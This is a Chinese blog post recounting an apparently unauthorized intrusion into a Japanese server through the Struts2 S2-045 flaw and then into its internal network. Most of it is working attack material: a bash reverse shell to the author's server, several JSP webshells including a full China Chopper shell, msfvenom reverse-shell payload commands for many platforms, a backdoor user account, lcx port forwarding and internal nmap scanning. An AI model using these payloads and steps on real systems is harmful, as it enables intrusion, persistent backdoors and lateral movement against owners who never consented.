Hexo

  • 首页

  • 归档

看我如何用structs2漏洞渗透日本的内网

发表于 2019-08-15 更新于 2019-12-08

看我如何用structs2漏洞渗透日本的内网

收集structs2的网站

利用在线网站搜索“structs”

https://www.zoomeye.org/

1564143780377

接着上扫描器把搜索到的ip扫一遍

这里介绍一个神器struts-scan,开源的github上面可以找到

https://github.com/Lucifer1993/struts-scan

扫描器扫一遍

这里尝试了很多ip,终于扫到一个小日本的ip存在s2_045漏洞

ip:https://118.152.xxx.xxx

1564145105303

命令 :python struts-scan.py https://118.152.xxx.xxx

  1. 1564144271728

然后直接用命令

python struts-scan.py -u https://118.152.xxx.xxx -i struts2-045

即可直接获得shell

1564144378395

然后这个shell一些命令被限制了,不过可以反弹shell,在自己的服务器上执行命令:

nc -lvvp 7070

接着在structs-scan得到的shell上输入反弹的命令

bash -i >& /dev/tcp/139.196.xxx.xxx/7070 0>&1

反弹成功,没想到的是获得的竟然是管理员权限

1564144721610

生成木马留后门

有了这么大权限就省了提权的麻烦,能干很多事情,先找到tomcat的目录(即外网能访问的目录),然后vim编辑jsp一句话木马

目录在/usr/local/tomcat/webapps/warehouse

jsp一句话有:

无回显

1
<%Runtime.getRuntime().exec(request.getParameter("i"));%>

请求:https://118.152.xxx.xxx/3.jsp?i=ls

有回显

1
2
3
4
5
6
7
8
9
10
11
12
<%
   if("023".equals(request.getParameter("pwd"))){
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
        int a = -1;
        byte[] b = new byte[2048];
        out.print("<pre>");
        while((a=in.read(b))!=-1){
            out.println(new String(b));
        }
        out.print("</pre>");
    }
%>

请求:https://118.152.xxx.xxx/4.jsp?pwd=023&i=ls

拿菜刀连的一句话(这一句话有点长),密码sky

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
<%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*"%>
<%!
String Pwd="sky";
String EC(String s,String c)throws Exception{return s;}//new String(s.getBytes("ISO-8859-1"),c);}
Connection GC(String s)throws Exception{String[] x=s.trim().split("\r\n");Class.forName(x[0].trim()).newInstance();
Connection c=DriverManager.getConnection(x[1].trim());if(x.length>2){c.setCatalog(x[2].trim());}return c;}
void AA(StringBuffer sb)throws Exception{File r[]=File.listRoots();for(int i=0;i<r.length;i++){sb.append(r[i].toString().substring(0,2));}}
void BB(String s,StringBuffer sb)throws Exception{File oF=new File(s),l[]=oF.listFiles();String sT, sQ,sF="";java.util.Date dt;
SimpleDateFormat fm=new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");for(int i=0;i<l.length;i++){dt=new java.util.Date(l[i].lastModified());
sT=fm.format(dt);sQ=l[i].canRead()?"R":"";sQ+=l[i].canWrite()?" W":"";if(l[i].isDirectory()){sb.append(l[i].getName()+"/\t"+sT+"\t"+l[i].length()+"\t"+sQ+"\n");}
else{sF+=l[i].getName()+"\t"+sT+"\t"+l[i].length()+"\t"+sQ+"\n";}}sb.append(sF);}
void EE(String s)throws Exception{File f=new File(s);if(f.isDirectory()){File x[]=f.listFiles();
for(int k=0;k<x.length;k++){if(!x[k].delete()){EE(x[k].getPath());}}}f.delete();}
void FF(String s,HttpServletResponse r)throws Exception{int n;byte[] b=new byte[512];r.reset();
ServletOutputStream os=r.getOutputStream();BufferedInputStream is=new BufferedInputStream(new FileInputStream(s));
os.write(("->"+"|").getBytes(),0,3);while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}os.write(("|"+"<-").getBytes(),0,3);os.close();is.close();}
void GG(String s, String d)throws Exception{String h="0123456789ABCDEF";int n;File f=new File(s);f.createNewFile();
FileOutputStream os=new FileOutputStream(f);for(int i=0;i<d.length();i+=2)
{os.write((h.indexOf(d.charAt(i))<<4|h.indexOf(d.charAt(i+1))));}os.close();}
void HH(String s,String d)throws Exception{File sf=new File(s),df=new File(d);if(sf.isDirectory()){if(!df.exists()){df.mkdir();}File z[]=sf.listFiles();
for(int j=0;j<z.length;j++){HH(s+"/"+z[j].getName(),d+"/"+z[j].getName());}
}else{FileInputStream is=new FileInputStream(sf);FileOutputStream os=new FileOutputStream(df);
int n;byte[] b=new byte[512];while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}is.close();os.close();}}
void II(String s,String d)throws Exception{File sf=new File(s),df=new File(d);sf.renameTo(df);}void JJ(String s)throws Exception{File f=new File(s);f.mkdir();}
void KK(String s,String t)throws Exception{File f=new File(s);SimpleDateFormat fm=new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");
java.util.Date dt=fm.parse(t);f.setLastModified(dt.getTime());}
void LL(String s, String d)throws Exception{URL u=new URL(s);int n;FileOutputStream os=new FileOutputStream(d);
HttpURLConnection h=(HttpURLConnection)u.openConnection();InputStream is=h.getInputStream();byte[] b=new byte[512];
while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}os.close();is.close();h.disconnect();}
void MM(InputStream is, StringBuffer sb)throws Exception{String l;BufferedReader br=new BufferedReader(new InputStreamReader(is));
while((l=br.readLine())!=null){sb.append(l+"\r\n");}}
void NN(String s,StringBuffer sb)throws Exception{Connection c=GC(s);ResultSet r=c.getMetaData().getCatalogs();
while(r.next()){sb.append(r.getString(1)+"\t");}r.close();c.close();}
void OO(String s,StringBuffer sb)throws Exception{Connection c=GC(s);String[] t={"TABLE"};ResultSet r=c.getMetaData().getTables (null,null,"%",t);
while(r.next()){sb.append(r.getString("TABLE_NAME")+"\t");}r.close();c.close();}
void PP(String s,StringBuffer sb)throws Exception{String[] x=s.trim().split("\r\n");Connection c=GC(s);
Statement m=c.createStatement(1005,1007);ResultSet r=m.executeQuery("select * from "+x[3]);ResultSetMetaData d=r.getMetaData();
for(int i=1;i<=d.getColumnCount();i++){sb.append(d.getColumnName(i)+" ("+d.getColumnTypeName(i)+")\t");}r.close();m.close();c.close();}
void QQ(String cs,String s,String q,StringBuffer sb)throws Exception{int i;Connection c=GC(s);Statement m=c.createStatement(1005,1008);
try{ResultSet r=m.executeQuery(q);ResultSetMetaData d=r.getMetaData();int n=d.getColumnCount();for(i=1;i<=n;i++){sb.append(d.getColumnName(i)+"\t|\t");
}sb.append("\r\n");while(r.next()){for(i=1;i<=n;i++){sb.append(EC(r.getString(i),cs)+"\t|\t");}sb.append("\r\n");}r.close();}
catch(Exception e){sb.append("Result\t|\t\r\n");try{m.executeUpdate(q);sb.append("Execute Successfully!\t|\t\r\n");
}catch(Exception ee){sb.append(ee.toString()+"\t|\t\r\n");}}m.close();c.close();}
%><%
String cs=request.getParameter("z0")+"";request.setCharacterEncoding(cs);response.setContentType("text/html;charset="+cs);
String Z=EC(request.getParameter(Pwd)+"",cs);String z1=EC(request.getParameter("z1")+"",cs);String z2=EC(request.getParameter("z2")+"",cs);
StringBuffer sb=new StringBuffer("");try{sb.append("->"+"|");
if(Z.equals("A")){String s=new File(application.getRealPath(request.getRequestURI())).getParent();sb.append(s+"\t");if(!s.substring(0,1).equals("/")){AA(sb);}}
else if(Z.equals("B")){BB(z1,sb);}else if(Z.equals("C")){String l="";BufferedReader br=new BufferedReader(new InputStreamReader(new FileInputStream(new File(z1))));
while((l=br.readLine())!=null){sb.append(l+"\r\n");}br.close();}
else if(Z.equals("D")){BufferedWriter bw=new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(z1))));
bw.write(z2);bw.close();sb.append("1");}else if(Z.equals("E")){EE(z1);sb.append("1");}else if(Z.equals("F")){FF(z1,response);}
else if(Z.equals("G")){GG(z1,z2);sb.append("1");}else if(Z.equals("H")){HH(z1,z2);sb.append("1");}else if(Z.equals("I")){II(z1,z2);sb.append("1");}
else if(Z.equals("J")){JJ(z1);sb.append("1");}else if(Z.equals("K")){KK(z1,z2);sb.append("1");}else if(Z.equals("L")){LL(z1,z2);sb.append("1");}
else if(Z.equals("M")){String[] c={z1.substring(2),z1.substring(0,2),z2};Process p=Runtime.getRuntime().exec(c);
MM(p.getInputStream(),sb);MM(p.getErrorStream(),sb);}else if(Z.equals("N")){NN(z1,sb);}else if(Z.equals("O")){OO(z1,sb);}
else if(Z.equals("P")){PP(z1,sb);}else if(Z.equals("Q")){QQ(cs,z1,z2,sb);}
}catch(Exception e){sb.append("ERROR"+":// "+e.toString());}sb.append("|"+"<-");out.print(sb.toString());
%>

不过这里由于环境原因会出现500的错误

1564145671043

msf生成木马

用msf可以生成多种后门

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
windows    -->使用模块“windows/meterpreter/reverse_tcp”
命令:msfvenom -p windows/meterpreter/reverse_tcp LHOST=139.196.xxx.xxx LPORT=44444 X >test.exe

linux -->使用模块“linux/x86/meterpreter/shell_rverse_tcp”
命令:msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=139.196.xxx.xxx LPORT=1234 X >text

java -->使用模块“java/meterpreter/reverse_tcp”
命令:msfvenom -p java/meterpreter/reverse_tcp LHOST=139.196.xxx.xxx LPORT=1234 W >text.jar

php -->使用模块“php/meterpreter/reverse_tcp”
命令:msfvenom -p php/meterpreter/reverse_tcp LHOST=139.196.xxx.xxx LPORT=1234 -f raw >text.php

jsp -->使用模块“java/jsp_shell_reverse_tcp”
命令:msfvenom -p java/jsp_shell_reverse_tcp LHOST=139.196.xxx.xxx LPORT=1234 R >text.jsp

asp -->使用模块“windows/meterpreter/reverse_tcp”
命令:msfvenom -p windows/meterpreter/reverse_tcp LHOST=139.196.xxx.xxx LPORT=1234 -f asp > shell.asp

aspx -->使用模块“windows/meterpreter/reverse_tcp”
命令:msfvenom -a x86 --platform win -p windows/meterpreter/reverse_tcp LHOST= 139.196.xxx.xxx LPORT=7788 -f aspx x> /home/niexinming/back.aspx

android -->使用模块“android/meterpreter/reverse_tcp”
命令:msfvenom -p android/meterpreter/reverse_tcp LHOST=139.196.xxx.xxx LPORT=1234 R >text.apk

这里我们使用jsp后门

命令:msfvenom -p java/jsp_shell_reverse_tcp LHOST=139.196.xxx.xxx LPORT=1234 R >text.jsp

接着进入msf框架,分别输入以下命令

use exploit/multi/handler
set PAYLOAD java/jsp_shell_reverse_tcp
set LHOST 139.196.xxx.xxx
set LPORT 1234

exploit

这里反弹的shell不能用git clone和yum,只能用wget,所以先把text.jsp传到自己的服务器上,再在肉鸡上用wget下载自己服务器上的text.jsp

接着请求 https://118.152.xxx.xxx/text.jsp

反弹shell

1564146678079

内网端口转发

由于该服务器在内网,无法用ssh直接连上去,不过可以用端口转发,这里我用的工具的lcx

github https://github.com/windworst/LCX

先在肉鸡上增加一个linux用户,输入命令:

useradd testuser

passwd testuser

找一个不常用的目录,mkdir创建文件夹,然后用wget下载lcx工具,unzip解压

输入命令,把肉鸡的22端口转发到自己服务器上的3333端口

./lcx -slave 139.196.xxx.xxx 3333 10.240.4.112 22

然后在自己的服务器上执行

./lcx -listen 3333 5555

监听3333和5555端口,把5555端口的请求转发到3333端口上,然后传给肉鸡的22端口

最后用xshell连139.196.xxx.xxx的5555端口,输入帐号密码

1564147965443

内网漫游

既然端口转发,就可以把自己内网上在同一个局域网的其他服务器转发出来

在肉鸡上安装nmap,用nmap扫描c段看下还有其他那些服务器

命令: nmap 10.240.4.0/24

1564148573531

先curl看一下

curl 10.240.4.101:8080

1564149259690

在自己的服务器上输入

./lcx -listen 1111 2222

1564149097965

然后在肉鸡上输入转发端口的命令:./lcx -slave 139.196.xxx.xxx 1111 10.240.4.x 8080

1564148849492

最后请求 http://139.196.xxx.xxx:2222/ 就能访问到内网服务器的其他网页

1564149144736

cve框架漏洞复现和实现自动化扫描器
二进制漏洞复现
  • 文章目录
  • 站点概览

GD

a GOOD pwner
14 日志
  1. 1. 看我如何用structs2漏洞渗透日本的内网
    1. 1.1. 收集structs2的网站
    2. 1.2. 扫描器扫一遍
    3. 1.3. 生成木马留后门
    4. 1.4. msf生成木马
      1. 1.4.0.0.1. 这里反弹的shell不能用git clone和yum,只能用wget,所以先把text.jsp传到自己的服务器上,再在肉鸡上用wget下载自己服务器上的text.jsp
  • 1.5. 内网端口转发
  • 1.6. 内网漫游
  • © 2019 GD
    由 Hexo 强力驱动 v3.7.1
    |
    主题 – NexT.Muse v7.3.0